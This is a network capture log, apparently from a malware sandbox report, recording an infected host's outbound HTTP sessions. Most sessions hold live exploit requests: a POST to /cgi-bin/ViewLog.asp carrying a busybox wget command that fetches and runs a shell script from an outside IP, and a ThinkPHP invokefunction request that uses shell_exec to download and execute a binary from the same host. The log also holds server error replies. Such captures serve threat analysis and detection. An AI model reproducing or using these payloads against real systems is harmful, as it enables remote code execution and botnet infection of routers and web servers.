                                                              Nov 13, 2023 22:18:01.713087082 CET512INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 431
                                                              Date: Mon, 13 Nov 2023 21:18:01 GMT
                                                              Keep-Alive: timeout=5
                                                              Connection: keep-alive
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              100192.168.2.234084031.200.51.1318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.151595116 CET3062OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1000192.168.2.235421495.101.75.11380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.571672916 CET19511OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:37.877183914 CET19614INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:20:37 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:37 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 66 31 37 39 32 36 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 34 33 37 26 23 34 36 3b 36 64 36 36 30 39 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;f1792617&#46;1699910437&#46;6d6609f</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1001192.168.2.233640495.168.210.21280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.584105968 CET19512OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:37.903736115 CET19615INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:37 GMT
                                                              Server: Apache/2.4.10 (Debian)
                                                              Content-Length: 308
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6d 61 69 6c 2e 69 6e 65 74 73 6f 6c 2e 62 69 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.10 (Debian) Server at mail.inetsol.biz Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1002192.168.2.236085095.163.16.428080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.692322016 CET19576OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:38.132730961 CET19636OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:38.472647905 CET19647INHTTP/1.1 401 Unauthorized
                                                              Server: nginx/1.10.2
                                                              Date: Mon, 13 Nov 2023 21:20:38 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 195
                                                              Connection: keep-alive
                                                              WWW-Authenticate: Basic realm="closed area"
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.10.2</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1003192.168.2.235889085.125.85.2068080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.692414999 CET19576OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:39.456613064 CET19763OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.537312984 CET20009OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:45.888227940 CET20458OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:54.334705114 CET20684OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:12.764178991 CET20708OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1004192.168.2.233904494.122.84.758080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.692468882 CET19577OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1005192.168.2.234359231.200.100.218080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.714359045 CET19579OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1006192.168.2.235908295.56.95.19680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.720335960 CET19589OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:38.097157955 CET19635INHTTP/1.1 200 OK
                                                              Nov 13, 2023 22:20:38.097265959 CET19635INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                              Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1007192.168.2.234594494.123.250.2328080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.355338097 CET19638OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1008192.168.2.235985031.200.6.2238080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.360444069 CET19639OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1009192.168.2.233620431.200.3.188080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.360579014 CET19640OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              101192.168.2.234602095.101.249.6780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.169802904 CET3063OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:24.456604958 CET3072INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:18:24 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:24 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 36 62 30 66 37 34 38 26 23 34 36 3b 31 36 39 39 39 31 30 33 30 34 26 23 34 36 3b 32 32 66 61 32 34 38 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;76b0f748&#46;1699910304&#46;22fa2488</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1010192.168.2.233353831.136.99.418080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.360841036 CET19640OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:39.360558033 CET19762OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.344312906 CET20006OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:45.375765085 CET20423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
